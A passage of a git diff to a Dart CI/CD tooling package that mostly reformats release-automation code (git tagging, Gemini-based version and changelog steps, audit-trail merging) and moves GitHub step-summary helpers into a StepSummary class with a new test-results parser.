_success('Proto verification passed: $protoCount sources, $generatedCount generated'); + _success( + 'Proto verification passed: $protoCount sources, $generatedCount generated', + ); } /// Run documentation update via Gemini. @@ -2366,7 +2633,10 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $docScript "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2374,7 +2644,9 @@ Future _runDocumentation(String repoRoot) async { ctx.savePrompt('documentation', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)', + ); return; } @@ -2384,7 +2656,9 @@ Future _runDocumentation(String repoRoot) async { final includes = []; if (File('/tmp/commit_analysis.json').existsSync()) { includes.add('@/tmp/commit_analysis.json'); - } else if (File('$repoRoot/$kCicdRunsDir/explore/commit_analysis.json').existsSync()) { + } else if (File( + '$repoRoot/$kCicdRunsDir/explore/commit_analysis.json', + ).existsSync()) { includes.add('@$repoRoot/$kCicdRunsDir/explore/commit_analysis.json'); } includes.add('@README.md'); @@ -2430,17 +2704,33 @@ Future _runPreReleaseTriage(String repoRoot, List args) async { if (!_geminiAvailable(warnOnly: true)) { _warn('Producing empty issue manifest (Gemini unavailable).'); final ctx = RunContext.create(repoRoot, 'pre-release-triage'); - final emptyManifest = '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; - ctx.saveArtifact('pre-release-triage', 'issue_manifest.json', emptyManifest); - _success('Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json'); + final emptyManifest = 
+ '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; + ctx.saveArtifact( + 'pre-release-triage', + 'issue_manifest.json', + emptyManifest, + ); + _success( + 'Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json', + ); ctx.finalize(exitCode: 0); return; } - final triageArgs = ['--pre-release', '--prev-tag', prevTag, '--version', newVersion, '--force']; + final triageArgs = [ + '--pre-release', + '--prev-tag', + prevTag, + '--version', + newVersion, + '--force', + ]; if (_verbose) triageArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -2490,7 +2780,9 @@ Future _runPostReleaseTriage(String repoRoot, List args) async { ]; if (_verbose) triageArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -2535,7 +2827,9 @@ Future _runArchiveRun(String repoRoot, List args) async { runDirPath = RunContext.findLatestRun(repoRoot); if (runDirPath == null) { _warn('No $kCicdRunsDir/ directory found — nothing to archive.'); - _info('This is expected if audit trail artifacts were not transferred between jobs.'); + _info( + 'This is expected if audit trail artifacts were not transferred between jobs.', + ); return; } _info('Using latest run: $runDirPath'); @@ -2572,7 +2866,9 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (args[i] == '--output-dir') outputDir = args[i + 1]; } - final incomingPath = incomingDir.startsWith('/') ? incomingDir : '$repoRoot/$incomingDir'; + final incomingPath = incomingDir.startsWith('/') + ? 
incomingDir + : '$repoRoot/$incomingDir'; final incoming = Directory(incomingPath); if (!incoming.existsSync()) { _warn('No incoming audit trails found at $incomingDir'); @@ -2588,8 +2884,14 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { // Create the merged run directory with a unique timestamp final now = DateTime.now(); - final timestamp = now.toIso8601String().replaceAll(':', '-').replaceAll('.', '-').substring(0, 19); - final outputPath = outputDir.startsWith('/') ? outputDir : '$repoRoot/$outputDir'; + final timestamp = now + .toIso8601String() + .replaceAll(':', '-') + .replaceAll('.', '-') + .substring(0, 19); + final outputPath = outputDir.startsWith('/') + ? outputDir + : '$repoRoot/$outputDir'; final mergedRunDir = '$outputPath/run_${timestamp}_merged'; Directory(mergedRunDir).createSync(recursive: true); @@ -2621,10 +2923,15 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (fileName == 'meta.json') { // Collect source meta for the merged meta.json try { - final meta = json.decode(child.readAsStringSync()) as Map; + final meta = + json.decode(child.readAsStringSync()) + as Map; sources.add({'artifact': artifactName, ...meta}); } catch (_) { - sources.add({'artifact': artifactName, 'error': 'failed to parse meta.json'}); + sources.add({ + 'artifact': artifactName, + 'error': 'failed to parse meta.json', + }); } } } @@ -2650,9 +2957,13 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { 'platform': Platform.operatingSystem, 'dart_version': Platform.version.split(' ').first, }; - File('$mergedRunDir/meta.json').writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n'); + File('$mergedRunDir/meta.json').writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n', + ); - _success('Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)'); + _success( + 'Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles 
files)', + ); } /// Recursively copy a directory tree. @@ -2782,7 +3093,9 @@ Future _installTree() async { } else if (Platform.isLinux) { _exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { - _info('tree is built-in on Windows (limited). For full tree: choco install tree'); + _info( + 'tree is built-in on Windows (limited). For full tree: choco install tree', + ); } } @@ -2791,7 +3104,10 @@ Future _installTree() async { // ═══════════════════════════════════════════════════════════════════════════════ String _detectPrevTag(String repoRoot) { - final result = _runSync("git tag -l 'v*' --sort=-version:refname | head -1", repoRoot); + final result = _runSync( + "git tag -l 'v*' --sort=-version:refname | head -1", + repoRoot, + ); if (result.isEmpty) { // No tags yet -- use the first commit (head -1 to handle multiple roots in monorepos) return _runSync('git rev-list --max-parents=0 HEAD | head -1', repoRoot); @@ -2800,7 +3116,10 @@ String _detectPrevTag(String repoRoot) { } String _detectNextVersion(String repoRoot, String prevTag) { - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); // Derive bump base from prevTag (not pubspec.yaml) to avoid stale-version collisions. final tagVersion = prevTag.startsWith('v') ? prevTag.substring(1) : prevTag; @@ -2819,11 +3138,20 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 
0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); - final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); + final commits = _runSync( + 'git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', + repoRoot, + ); + final commitSubjects = _runSync( + 'git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', + repoRoot, + ); var bump = 'patch'; - if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { + if (RegExp( + r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', + multiLine: true, + ).hasMatch(commits)) { bump = 'major'; } else if (RegExp(r'^feat(\(.+\))?:', multiLine: true).hasMatch(commits)) { bump = 'minor'; @@ -2831,7 +3159,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { commitSubjects .split('\n') .every( - (line) => line.trim().isEmpty || RegExp(r'^(chore|style|ci|docs|build)(\(.+\))?:').hasMatch(line.trim()), + (line) => + line.trim().isEmpty || + RegExp( + r'^(chore|style|ci|docs|build)(\(.+\))?:', + ).hasMatch(line.trim()), )) { // Only pure infra/docs/style/build commits with no code changes → no release. // fix:, test:, perf:, and refactor: all default to at least patch. 
@@ -2841,15 +3173,30 @@ String _detectNextVersion(String repoRoot, String prevTag) { _info(' Regex heuristic: $bump'); // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── - if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); - final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); - final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); + if (_commandExists('gemini') && + Platform.environment['GEMINI_API_KEY'] != null) { + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); + final changedFiles = _runSync( + 'git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', + repoRoot, + ); + final diffStat = _runSync( + 'git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', + repoRoot, + ); + final existingTags = _runSync( + "git tag -l 'v*' --sort=-version:refname | head -10", + repoRoot, + ); final commitSummary = commits.split('\n').take(50).join('\n'); // Create a version analysis output directory within the CWD (sandbox-safe) - final versionAnalysisDir = Directory('$repoRoot/$kCicdRunsDir/version_analysis'); + final versionAnalysisDir = Directory( + '$repoRoot/$kCicdRunsDir/version_analysis', + ); versionAnalysisDir.createSync(recursive: true); final bumpJsonPath = '${versionAnalysisDir.path}/version_bump.json'; final prompt = @@ -2902,15 +3249,27 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Save Gemini response for audit trail (strip MCP/warning prefix) if (geminiResult.isNotEmpty) { final jsonStart = geminiResult.indexOf('{'); - final cleaned = jsonStart > 0 ? 
geminiResult.substring(jsonStart) : geminiResult; - File('${versionAnalysisDir.path}/gemini_response.json').writeAsStringSync(cleaned); + final cleaned = jsonStart > 0 + ? geminiResult.substring(jsonStart) + : geminiResult; + File( + '${versionAnalysisDir.path}/gemini_response.json', + ).writeAsStringSync(cleaned); } if (geminiResult.isNotEmpty && File(bumpJsonPath).existsSync()) { try { - final bumpData = json.decode(File(bumpJsonPath).readAsStringSync()) as Map; - final rawBump = (bumpData['bump'] as String?)?.trim().toLowerCase().replaceAll(RegExp(r'[^a-z]'), ''); - if (rawBump == 'major' || rawBump == 'minor' || rawBump == 'patch' || rawBump == 'none') { + final bumpData = + json.decode(File(bumpJsonPath).readAsStringSync()) + as Map; + final rawBump = (bumpData['bump'] as String?) + ?.trim() + .toLowerCase() + .replaceAll(RegExp(r'[^a-z]'), ''); + if (rawBump == 'major' || + rawBump == 'minor' || + rawBump == 'patch' || + rawBump == 'none') { _info(' Gemini analysis: $rawBump (overriding regex: $bump)'); bump = rawBump!; } else { @@ -2949,7 +3308,9 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Guard: ensure version never goes backward from what pubspec.yaml already has if (_compareVersions(nextVersion, currentVersion) < 0) { - _warn('Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.'); + _warn( + 'Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.', + ); return currentVersion; } @@ -3031,13 +3392,19 @@ String _buildReleaseCommitMessage({ buf.writeln('## Changelog'); buf.writeln(); // Trim to first 2000 chars to keep commit message reasonable - buf.writeln(entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry); + buf.writeln( + entry.length > 2000 ? '${entry.substring(0, 2000)}...' 
: entry, + ); buf.writeln(); } } // Staged file summary - final stagedResult = Process.runSync('git', ['diff', '--cached', '--stat'], workingDirectory: repoRoot); + final stagedResult = Process.runSync('git', [ + 'diff', + '--cached', + '--stat', + ], workingDirectory: repoRoot); final stagedStat = (stagedResult.stdout as String).trim(); if (stagedStat.isNotEmpty) { buf.writeln('## Files Modified'); @@ -3055,7 +3422,11 @@ String _buildReleaseCommitMessage({ if (rationale.isNotEmpty) { buf.writeln('## Version Bump Rationale'); buf.writeln(); - buf.writeln(rationale.length > 1000 ? '${rationale.substring(0, 1000)}...' : rationale); + buf.writeln( + rationale.length > 1000 + ? '${rationale.substring(0, 1000)}...' + : rationale, + ); buf.writeln(); } } @@ -3083,9 +3454,14 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); buf.writeln('---'); - buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); + buf.writeln( + 'Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)', + ); buf.writeln('Commits since $prevTag: $commitCount'); buf.writeln('Generated: ${DateTime.now().toUtc().toIso8601String()}'); @@ -3104,7 +3480,10 @@ bool _commandExists(String command) { String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); - final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); + final result = Process.runSync('sh', [ + '-c', + command, + ], workingDirectory: workingDirectory); final output = (result.stdout as String).trim(); if (_verbose && output.isNotEmpty) _info(' $output'); return output; @@ -3113,44 +3492,29 @@ String _runSync(String command, String workingDirectory) { /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). 
/// No-op when running locally (env var not set). void _writeStepSummary(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); - } + StepSummary.write(markdown); } // ── Step Summary Helpers ───────────────────────────────────────────────────── /// Build a link to the current workflow run's artifacts page. String _artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY']; - final runId = Platform.environment['GITHUB_RUN_ID']; - if (repo == null || runId == null) return ''; - return '[$label]($server/$repo/actions/runs/$runId)'; + return StepSummary.artifactLink(label); } /// Build a GitHub compare link between two refs. String _compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - final text = label ?? '$prevTag...$newTag'; - return '[$text]($server/$repo/compare/$prevTag...$newTag)'; + return StepSummary.compareLink(prevTag, newTag, label); } /// Build a link to a file/path in the repository. String _ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; - final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; - return '[$label]($server/$repo/blob/$sha/$path)'; + return StepSummary.ghLink(label, path); } /// Build a link to a GitHub Release by tag. String _releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? 
'${config.repoOwner}/${config.repoName}'; - return '[v$tag]($server/$repo/releases/tag/$tag)'; + return StepSummary.releaseLink(tag); } /// Add Keep a Changelog reference-style links to the bottom of CHANGELOG.md. @@ -3162,8 +3526,11 @@ String _releaseLink(String tag) { /// ``` /// Idempotent: replaces any existing reference-link block. void _addChangelogReferenceLinks(String repoRoot, String content) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; // Extract all version headers: ## [X.Y.Z] (skip any [Unreleased] entries) final versionPattern = RegExp(r'^## \[([^\]]+)\]', multiLine: true); @@ -3171,7 +3538,10 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (matches.isEmpty) return; - final versions = matches.map((m) => m.group(1)!).where((v) => v != 'Unreleased').toList(); + final versions = matches + .map((m) => m.group(1)!) + .where((v) => v != 'Unreleased') + .toList(); if (versions.isEmpty) return; @@ -3182,7 +3552,9 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (i + 1 < versions.length) { // Compare from previous version final prevVersion = versions[i + 1]; - links.writeln('[$version]: $server/$repo/compare/v$prevVersion...v$version'); + links.writeln( + '[$version]: $server/$repo/compare/v$prevVersion...v$version', + ); } else { // Oldest version: link to the tag itself links.writeln('[$version]: $server/$repo/releases/tag/v$version'); @@ -3193,7 +3565,9 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (linksStr.isEmpty) return; // Strip any existing reference-link block (lines matching [X.Y.Z]: http...) 
- final existingLinksPattern = RegExp(r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$'); + final existingLinksPattern = RegExp( + r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$', + ); var cleaned = content.replaceAll(existingLinksPattern, ''); cleaned = cleaned.trimRight(); @@ -3205,9 +3579,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { /// Wrap content in a collapsible
block for step summaries. String _collapsible(String title, String content, {bool open = false}) { - if (content.trim().isEmpty) return ''; - final openAttr = open ? ' open' : ''; - return '\n\n$title\n\n$content\n\n
\n'; + return StepSummary.collapsible(title, content, open: open); } /// Read a file and return its content, or a fallback message if not found. @@ -3217,7 +3589,12 @@ String _readFileOr(String path, [String fallback = '(not available)']) { } /// Execute a command. Set [fatal] to true to exit on failure (default: false). -void _exec(String executable, List args, {String? cwd, bool fatal = false}) { +void _exec( + String executable, + List args, { + String? cwd, + bool fatal = false, +}) { if (_verbose) _info(' \$ $executable ${args.join(" ")}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { @@ -3228,7 +3605,9 @@ void _exec(String executable, List args, {String? cwd, bool fatal = fals void _requireGeminiCli() { if (!_commandExists('gemini')) { - _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); + _error( + 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', + ); exit(1); } } @@ -3237,7 +3616,9 @@ void _requireApiKey() { final key = Platform.environment['GEMINI_API_KEY']; if (key == null || key.isEmpty) { _error('GEMINI_API_KEY is not set.'); - _error('Set it via: export GEMINI_API_KEY='); + _error( + 'Set it via: export GEMINI_API_KEY=', + ); exit(1); } } @@ -3250,7 +3631,9 @@ bool _geminiAvailable({bool warnOnly = false}) { _warn('Gemini CLI not installed — skipping Gemini-powered step.'); return false; } - _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); + _error( + 'Gemini CLI is not installed. 
Run: dart run runtime_ci_tooling:manage_cicd setup', + ); exit(1); } final key = Platform.environment['GEMINI_API_KEY']; @@ -3354,9 +3737,15 @@ Future _runInit(String repoRoot) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); if (pubspecFile.existsSync()) { final content = pubspecFile.readAsStringSync(); - final nameMatch = RegExp(r'^name:\s*(\S+)', multiLine: true).firstMatch(content); + final nameMatch = RegExp( + r'^name:\s*(\S+)', + multiLine: true, + ).firstMatch(content); if (nameMatch != null) packageName = nameMatch.group(1)!; - final versionMatch = RegExp(r'^version:\s*(\S+)', multiLine: true).firstMatch(content); + final versionMatch = RegExp( + r'^version:\s*(\S+)', + multiLine: true, + ).firstMatch(content); if (versionMatch != null) packageVersion = versionMatch.group(1)!; _success('Detected package: $packageName v$packageVersion'); } else { @@ -3385,7 +3774,11 @@ Future _runInit(String repoRoot) async { if (repoOwner == 'unknown') { // Fallback: try parsing git remote try { - final gitResult = Process.runSync('git', ['remote', 'get-url', 'origin'], workingDirectory: repoRoot); + final gitResult = Process.runSync('git', [ + 'remote', + 'get-url', + 'origin', + ], workingDirectory: repoRoot); if (gitResult.exitCode == 0) { final url = (gitResult.stdout as String).trim(); // git@github.com:owner/repo.git or https://github.com/owner/repo.git @@ -3441,7 +3834,12 @@ Future _runInit(String repoRoot) async { 'release_notes_path': '$kReleaseNotesDir', }, 'gcp': {'project': ''}, - 'sentry': {'organization': '', 'projects': [], 'scan_on_pre_release': false, 'recent_errors_hours': 168}, + 'sentry': { + 'organization': '', + 'projects': [], + 'scan_on_pre_release': false, + 'recent_errors_hours': 168, + }, 'release': { 'pre_release_scan_sentry': false, 'pre_release_scan_github': true, @@ -3460,13 +3858,25 @@ Future _runInit(String repoRoot) async { }, }, 'labels': { - 'type': ['bug', 'feature-request', 'enhancement', 'documentation', 'question'], + 
'type': [ + 'bug', + 'feature-request', + 'enhancement', + 'documentation', + 'question', + ], 'priority': ['P0-critical', 'P1-high', 'P2-medium', 'P3-low'], 'area': areaLabels, }, 'thresholds': {'auto_close': 0.9, 'suggest_close': 0.7, 'comment': 0.5}, 'agents': { - 'enabled': ['code_analysis', 'pr_correlation', 'duplicate', 'sentiment', 'changelog'], + 'enabled': [ + 'code_analysis', + 'pr_correlation', + 'duplicate', + 'sentiment', + 'changelog', + ], 'conditional': { 'changelog': {'require_file': 'CHANGELOG.md'}, }, @@ -3486,7 +3896,9 @@ Future _runInit(String repoRoot) async { }, }; - configFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(configData)}\n'); + configFile.writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(configData)}\n', + ); _success('Created $kConfigFileName'); } else { _info('$kConfigFileName already exists (kept as-is)'); @@ -3511,12 +3923,16 @@ Future _runInit(String repoRoot) async { if (gitignoreFile.existsSync()) { final content = gitignoreFile.readAsStringSync(); if (!content.contains('.runtime_ci/runs/')) { - gitignoreFile.writeAsStringSync('$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); + gitignoreFile.writeAsStringSync( + '$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', + ); _success('Added .runtime_ci/runs/ to .gitignore'); repaired++; } } else { - gitignoreFile.writeAsStringSync('# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); + gitignoreFile.writeAsStringSync( + '# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', + ); _success('Created .gitignore with .runtime_ci/runs/'); repaired++; } @@ -3539,7 +3955,9 @@ Future _runInit(String repoRoot) async { print(''); if (!configExists) { _info('Next steps:'); - _info(' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.'); + _info( + ' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.', + ); _info(' 2. 
Add runtime_ci_tooling as a dev_dependency in pubspec.yaml'); _info(' 3. Run: dart run runtime_ci_tooling:manage_cicd setup'); _info(' 4. Run: dart run runtime_ci_tooling:manage_cicd status'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 20f3568..763ae86 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,6 +1,35 @@ +import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; +import 'logger.dart'; + +/// A single failed test record parsed from the JSON reporter output. +class TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed aggregate test results from the NDJSON file reporter. +class TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List failures = []; + bool parsed = false; +} /// Step summary utilities for GitHub Actions. abstract final class StepSummary { @@ -15,7 +44,8 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; final repo = Platform.environment['GITHUB_REPOSITORY']; final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; @@ -24,24 +54,33 @@ abstract final class StepSummary { /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 
'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = + Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = + Platform.environment['GITHUB_REPOSITORY'] ?? + '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -54,6 +93,227 @@ abstract final class StepSummary { /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); + return input + .replaceAll('&', '&') + .replaceAll('<', '<') + .replaceAll('>', '>') + .replaceAll('"', '"'); + } + + /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. 
+ static TestResults parseTestResultsJson(String jsonPath) { + final results = TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? 
''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) + testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; + } + + /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. + static void writeTestJobSummary(TestResults results, int exitCode) { + final buf = StringBuffer(); + + final platformId = + Platform.environment['PLATFORM_ID'] ?? + Platform.environment['RUNNER_NAME'] ?? + Platform.operatingSystem; + + buf.writeln('## Test Results — ${escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln( + '> Tests $status (exit code $exitCode) — no structured results available.', + ); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(artifactLink(':package: View full test logs')); + write(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + final displayFailures = results.failures.take(20).toList(); + 